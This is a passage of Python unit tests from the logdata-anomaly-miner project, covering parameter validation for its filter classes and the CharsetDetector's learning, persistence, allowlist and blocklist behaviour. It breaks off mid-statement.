self.assertRaises(TypeError, SubhandlerFilter, [nmpd], ["Default"]) self.assertRaises(TypeError, SubhandlerFilter, [nmpd], []) self.assertRaises(TypeError, SubhandlerFilter, [nmpd], ()) self.assertRaises(TypeError, SubhandlerFilter, [nmpd], set()) SubhandlerFilter([nmpd], False) def test6validate_parameters_MatchPathFilter(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False) self.assertRaises(TypeError, MatchPathFilter, [""]) self.assertRaises(TypeError, MatchPathFilter, [b""]) self.assertRaises(TypeError, MatchPathFilter, [True]) self.assertRaises(TypeError, MatchPathFilter, [None]) self.assertRaises(TypeError, MatchPathFilter, [123]) self.assertRaises(TypeError, MatchPathFilter, [123.2]) self.assertRaises(TypeError, MatchPathFilter, [{"id": "Default"}]) self.assertRaises(TypeError, MatchPathFilter, [["Default"]]) self.assertRaises(TypeError, MatchPathFilter, [set()]) self.assertRaises(TypeError, MatchPathFilter, [()]) self.assertRaises(TypeError, MatchPathFilter, [("path", None)]) self.assertRaises(TypeError, MatchPathFilter, [("path", nmpd)], "") self.assertRaises(TypeError, MatchPathFilter, [("path", nmpd)], True) self.assertRaises(TypeError, MatchPathFilter, [("path", nmpd)], b"Default") self.assertRaises(TypeError, MatchPathFilter, [("path", nmpd)], 123) self.assertRaises(TypeError, MatchPathFilter, [("path", nmpd)], 123.2) self.assertRaises(TypeError, MatchPathFilter, [("path", nmpd)], {"id": "Default"}) self.assertRaises(TypeError, MatchPathFilter, [("path", nmpd)], ["Default"]) self.assertRaises(TypeError, MatchPathFilter, [("path", nmpd)], []) self.assertRaises(TypeError, MatchPathFilter, [("path", nmpd)], ()) self.assertRaises(TypeError, MatchPathFilter, [("path", nmpd)], set()) MatchPathFilter([("path", nmpd)], None) MatchPathFilter([("path", nmpd)], nmpd) def test7validate_parameters_MatchValueFilter(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False) dictionary = {b"val": nmpd} path = "path" self.assertRaises(ValueError, MatchValueFilter, "", dictionary) self.assertRaises(TypeError, MatchValueFilter, b"", dictionary) self.assertRaises(TypeError, MatchValueFilter, True, dictionary) self.assertRaises(TypeError, MatchValueFilter, None, dictionary) self.assertRaises(TypeError, MatchValueFilter, 123, dictionary) self.assertRaises(TypeError, MatchValueFilter, 123.2, dictionary) self.assertRaises(TypeError, MatchValueFilter, {"id": "Default"}, dictionary) self.assertRaises(TypeError, MatchValueFilter, ["Default"], dictionary) self.assertRaises(TypeError, MatchValueFilter, set(), dictionary) self.assertRaises(TypeError, MatchValueFilter, (), dictionary) self.assertRaises(TypeError, MatchValueFilter, ("path", None), dictionary) self.assertRaises(TypeError, MatchValueFilter, path, "") self.assertRaises(TypeError, MatchValueFilter, path, True) self.assertRaises(TypeError, MatchValueFilter, path, b"Default") self.assertRaises(TypeError, MatchValueFilter, path, 123) self.assertRaises(TypeError, MatchValueFilter, path, 123.2) self.assertRaises(TypeError, MatchValueFilter, path, {"id": "Default"}) self.assertRaises(TypeError, MatchValueFilter, path, ["Default"]) self.assertRaises(TypeError, MatchValueFilter, path, []) self.assertRaises(TypeError, MatchValueFilter, path, ()) self.assertRaises(TypeError, MatchValueFilter, path, set()) self.assertRaises(TypeError, MatchValueFilter, path, {"id": None}) self.assertRaises(TypeError, MatchValueFilter, path, dictionary, "") self.assertRaises(TypeError, MatchValueFilter, path, dictionary, b"") self.assertRaises(TypeError, MatchValueFilter, path, dictionary, True) self.assertRaises(TypeError, MatchValueFilter, path, dictionary, 123) self.assertRaises(TypeError, MatchValueFilter, path, dictionary, 123.22) self.assertRaises(TypeError, MatchValueFilter, path, dictionary, {"id": "Default"}) self.assertRaises(TypeError, MatchValueFilter, path, dictionary, ["Default"]) self.assertRaises(TypeError, MatchValueFilter, path, dictionary, [nmpd]) self.assertRaises(TypeError, MatchValueFilter, path, dictionary, set()) self.assertRaises(TypeError, MatchValueFilter, path, dictionary, ()) MatchValueFilter("path", dictionary, None) MatchValueFilter("path", dictionary, nmpd) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/CharsetDetectorTest.py000066400000000000000000000756411500476301700301150ustar00rootroot00000000000000import unittest import time from datetime import datetime from aminer.analysis.CharsetDetector import CharsetDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD class CharsetDetectorTest(TestBase): """Unittests for the ValueRangeDetectorDetector.""" def test1receive_atom(self): """ This test case checks the normal detection of new character sets. The charset detector is used to learn an alphabet and detect new characters for different identifiers. Test if log atoms are processed correctly and the detector is learning (learn_mode=True) and stops if learn_mode=False. Test if stop_learning_time and stop_learning_no_anomaly_timestamp are implemented properly. """ t = time.time() expected_string = '%s New character(s) detected\n%s: "None" (%d lines)\n %s\n\n' dtf = "%Y-%m-%d %H:%M:%S" # Prepare log atoms that represent two entities (id) with strings (value). Anomalies are generated when new characters are observed. # The following events are generated: # id: a value: abc # id: b value: xyz # id: a value: asdf # id: a value: xxx # id: a value: bass # id: a value: max m1 = MatchElement("/model/id", b"a", b"a", None) m2 = MatchElement("/model/value", b"abc", b"abc", None) log_atom1 = LogAtom(b"aabc", ParserMatch(MatchElement("/model", b"aabc", b"aabc", [m1, m2])), t+1, None) m3 = MatchElement("/model/id", b"b", b"b", None) m4 = MatchElement("/model/value", b"xyz", b"xyz", None) log_atom2 = LogAtom(b"bxyz", ParserMatch(MatchElement("/model", b"bxyz", b"bxyz", [m3, m4])), t+2, None) m5 = MatchElement("/model/id", b"a", b"a", None) m6 = MatchElement("/model/value", b"asdf", b"asdf", None) log_atom3 = LogAtom(b"aasdf", ParserMatch(MatchElement("/model", b"aasdf", b"aasdf", [m5, m6])), t+3, None) m7 = MatchElement("/model/id", b"a", b"a", None) m8 = MatchElement("/model/value", b"xxx", b"xxx", None) log_atom4 = LogAtom(b"bxxx", ParserMatch(MatchElement("/model", b"bxxx", b"bxxx", [m7, m8])), t+4, None) m9 = MatchElement("/model/id", b"a", b"a", None) m10 = MatchElement("/model/value", b"bass", b"bass", None) log_atom5 = LogAtom(b"abass", ParserMatch(MatchElement("/model", b"abass", b"abass", [m9, m10])), t+5, None) m11 = MatchElement("/model/id", b"a", b"a", None) m12 = MatchElement("/model/value", b"max", b"max", None) log_atom6 = LogAtom(b"bmax", ParserMatch(MatchElement("/model", b"bmax", b"bmax", [m11, m12])), t+6, None) cd = CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, output_logline=False) # Forward log atoms to detector # First value of id (a) should not generate an anomaly # Input: id: a value: abc # Expected output: None cd.receive_atom(log_atom1) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(cd.charsets, {("a",): set([ord(x) for x in "abc"])}) # First value of id (b) should not generate an anomaly # Input: id: b value: xyz # Expected output: None cd.receive_atom(log_atom2) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(cd.charsets, {("a",): set([ord(x) for x in "abc"]), ("b",): set([ord(x) for x in "xyz"])}) # Second value of id (a) should generate an anomaly for new characters ("sdf" of "asdf" not in "abc") # Input: id: a value: asdf # Expected output: Anomaly cd.receive_atom(log_atom3) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 3).strftime(dtf), cd.__class__.__name__, 1, "aasdf")) self.reset_output_stream() self.assertEqual(cd.charsets, {("a",): set([ord(x) for x in "abcdfs"]), ("b",): set([ord(x) for x in "xyz"])}) # Third value of id (a) should generate an anomaly for new characters ("x" not in "abcsdf", only in "xyz" from other id (b)) # Input: id: a value: xxx # Expected output: Anomaly cd.receive_atom(log_atom4) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 4).strftime(dtf), cd.__class__.__name__, 1, "bxxx")) self.reset_output_stream() self.assertEqual(cd.charsets, {("a",): set([ord(x) for x in "abcdfsx"]), ("b",): set([ord(x) for x in "xyz"])}) # Fourth value of id (a) should not generate an anomaly (all characters of "bass" in "abcsdfx") # Input: id: a value: bass # Expected output: None cd.receive_atom(log_atom5) self.assertEqual(self.output_stream.getvalue(), "") self.assertEqual(cd.charsets, {("a",): set([ord(x) for x in "abcdfsx"]), ("b",): set([ord(x) for x in "xyz"])}) # Fifth value of id (a) should generate an anomaly for new characters ("m" of "max" not in "abcsdfx") cd.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t + 6).strftime(dtf), cd.__class__.__name__, 1, "bmax")) self.reset_output_stream() self.assertEqual(cd.charsets, {("a",): set([ord(x) for x in "abcdfmsx"]), ("b",): set([ord(x) for x in "xyz"])}) # stop_learning_time cd = CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, output_logline=False, stop_learning_time=100) self.assertTrue(cd.receive_atom(log_atom1)) log_atom1.atom_time = t + 99 self.assertTrue(cd.receive_atom(log_atom1)) self.assertTrue(cd.learn_mode) log_atom1.atom_time = t + 102 self.assertTrue(cd.receive_atom(log_atom1)) self.assertFalse(cd.learn_mode) # stop_learning_no_anomaly_time cd = CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, output_logline=False, stop_learning_no_anomaly_time=100) log_atom1.atom_time = t self.assertTrue(cd.receive_atom(log_atom1)) log_atom1.atom_time = t + 100 self.assertTrue(cd.receive_atom(log_atom1)) self.assertTrue(cd.learn_mode) log_atom2.atom_time = t + 100 self.assertTrue(cd.receive_atom(log_atom2)) self.assertTrue(cd.learn_mode) log_atom1.atom_time = t + 200 self.assertTrue(cd.receive_atom(log_atom3)) self.assertTrue(cd.learn_mode) log_atom1.atom_time = t + 201 self.assertTrue(cd.receive_atom(log_atom1)) self.assertFalse(cd.learn_mode) def test2do_timer(self): """Test if the do_timer method is implemented properly.""" cd = CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"]) t = time.time() cd.next_persist_time = t + 400 self.assertEqual(cd.do_timer(t + 200), 200) self.assertEqual(cd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(cd.do_timer(t + 999), 1) self.assertEqual(cd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test3allowlist_event(self): """Test if the allowlist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. cd = CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"]) analysis = "Analysis.%s" self.assertRaises(Exception, cd.allowlist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None) # The CharsetDetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, cd.allowlist_event, analysis % cd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(cd.allowlist_event(analysis % cd.__class__.__name__, "/s1", None), "Allowlisted path %s in %s." % ("/s1", analysis % cd.__class__.__name__)) self.assertEqual(cd.constraint_list, ["/s1"]) cd.learn_mode = False self.assertEqual(cd.allowlist_event(analysis % cd.__class__.__name__, "/d1", None), "Allowlisted path %s in %s." % ("/d1", analysis % cd.__class__.__name__)) self.assertEqual(cd.constraint_list, ["/s1", "/d1"]) def test4blocklist_event(self): """Test if the blocklist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. cd = CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"]) analysis = "Analysis.%s" self.assertRaises(Exception, cd.blocklist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None) # The CharsetDetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, cd.blocklist_event, analysis % cd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(cd.blocklist_event(analysis % cd.__class__.__name__, "/s1", None), "Blocklisted path %s in %s." % ("/s1", analysis % cd.__class__.__name__)) self.assertEqual(cd.ignore_list, ["/s1"]) cd.learn_mode = False self.assertEqual(cd.blocklist_event(analysis % cd.__class__.__name__, "/d1", None), "Blocklisted path %s in %s." % ("/d1", analysis % cd.__class__.__name__)) self.assertEqual(cd.ignore_list, ["/s1", "/d1"]) def test5persistence(self): """Test the do_persist and load_persistence_data methods.""" t = time.time() cd = CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, output_logline=False) m1 = MatchElement("/model/id", b"a", b"a", None) m2 = MatchElement("/model/value", b"abc", b"abc", None) log_atom1 = LogAtom(b"aabc", ParserMatch(MatchElement("/model", b"aabc", b"aabc", [m1, m2])), t + 1, None) m3 = MatchElement("/model/id", b"b", b"b", None) m4 = MatchElement("/model/value", b"xyz", b"xyz", None) log_atom2 = LogAtom(b"bxyz", ParserMatch(MatchElement("/model", b"bxyz", b"bxyz", [m3, m4])), t + 2, None) m5 = MatchElement("/model/id", b"a", b"a", None) m6 = MatchElement("/model/value", b"asdf", b"asdf", None) log_atom3 = LogAtom(b"aasdf", ParserMatch(MatchElement("/model", b"aasdf", b"aasdf", [m5, m6])), t + 3, None) m7 = MatchElement("/model/id", b"a", b"a", None) m8 = MatchElement("/model/value", b"xxx", b"xxx", None) log_atom4 = LogAtom(b"bxxx", ParserMatch(MatchElement("/model", b"bxxx", b"bxxx", [m7, m8])), t + 4, None) m9 = MatchElement("/model/id", b"a", b"a", None) m10 = MatchElement("/model/value", b"bass", b"bass", None) log_atom5 = LogAtom(b"abass", ParserMatch(MatchElement("/model", b"abass", b"abass", [m9, m10])), t + 5, None) m11 = MatchElement("/model/id", b"a", b"a", None) m12 = MatchElement("/model/value", b"max", b"max", None) log_atom6 = LogAtom(b"bmax", ParserMatch(MatchElement("/model", b"bmax", b"bmax", [m11, m12])), t + 6, None) cd.receive_atom(log_atom1) cd.receive_atom(log_atom2) cd.receive_atom(log_atom3) cd.receive_atom(log_atom4) cd.receive_atom(log_atom5) cd.receive_atom(log_atom6) cd.do_persist() with open(cd.persistence_file_name, "r") as f: self.assertEqual(f.read(), '[[["string:a"], [97, 98, 99, 115, 100, 102, 120, 109]], [["string:b"], [120, 121, 122]]]') self.assertEqual(cd.charsets, {("a",): set([ord(x) for x in "abcdfmsx"]), ("b",): set([ord(x) for x in "xyz"])}) cd.charsets = {} cd.load_persistence_data() self.assertEqual(cd.charsets, {("a",): set([ord(x) for x in "abcdfmsx"]), ("b",): set([ord(x) for x in "xyz"])}) other = CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, output_logline=False) self.assertEqual(other.charsets, cd.charsets) def test6validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(TypeError, CharsetDetector, self.aminer_config, ["default"], ["/model/id"], ["/model/value"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, None, ["/model/id"], ["/model/value"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, "", ["/model/id"], ["/model/value"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, b"Default", ["/model/id"], ["/model/value"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, True, ["/model/id"], ["/model/value"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, 123, ["/model/id"], ["/model/value"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, 123.3, ["/model/id"], ["/model/value"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, {"id": "Default"}, ["/model/id"], ["/model/value"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, (), ["/model/id"], ["/model/value"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, set(), ["/model/id"], ["/model/value"]) self.assertRaises(ValueError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], [""], ["/model/value"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], "", ["/model/value"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], b"Default", ["/model/value"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], True, ["/model/value"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], 123, ["/model/value"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], 123.3, ["/model/value"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], {"id": "Default"}, ["/model/value"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], (), ["/model/value"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], set(), ["/model/value"]) self.assertRaises(ValueError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], [""]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], "") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], b"Default") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], True) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], 123) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], 123.3) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], {"id": "Default"}) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ()) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], set()) self.assertRaises(ValueError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], persistence_id="") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], persistence_id=None) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], persistence_id=b"Default") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], persistence_id=True) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], persistence_id=123) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], persistence_id=123.22) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], persistence_id={"id": "Default"}) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], persistence_id=["Default"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], persistence_id=[]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], persistence_id=()) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], persistence_id=set()) CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], persistence_id="Default") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=b"True") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode="True") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=123) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=123.22) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode={"id": "Default"}) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=["Default"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=[]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=()) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=set()) CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], output_logline=None) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], output_logline=b"True") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], output_logline="True") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], output_logline=123) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], output_logline=123.22) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], output_logline={"id": "Default"}) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], output_logline=["Default"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], output_logline=[]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], output_logline=()) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], output_logline=set()) CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], output_logline=True) self.assertRaises(ValueError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], ignore_list=[""]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], ignore_list="") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], ignore_list=b"Default") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], ignore_list=True) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], ignore_list=123) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], ignore_list=123.3) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], ignore_list={"id": "Default"}) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], ignore_list=()) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], ignore_list=set()) CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], ignore_list=[]) CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], ignore_list=None) self.assertRaises(ValueError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], constraint_list=[""]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], constraint_list="") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], constraint_list=b"Default") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], constraint_list=True) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], constraint_list=123) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], constraint_list=123.3) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], constraint_list={"id": "Default"}) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], constraint_list=()) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], constraint_list=set()) CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], constraint_list=[]) CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], constraint_list=None) self.assertRaises(ValueError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_time=set()) CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_time=100) CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=set()) CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=100) CharsetDetector(self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], log_resource_ignore_list="") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], log_resource_ignore_list=True) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, [self.stream_printer_event_handler], ["/model/id"], ["/model/value"], log_resource_ignore_list=123) self.assertRaises(TypeError, CharsetDetector, self.aminer_config, 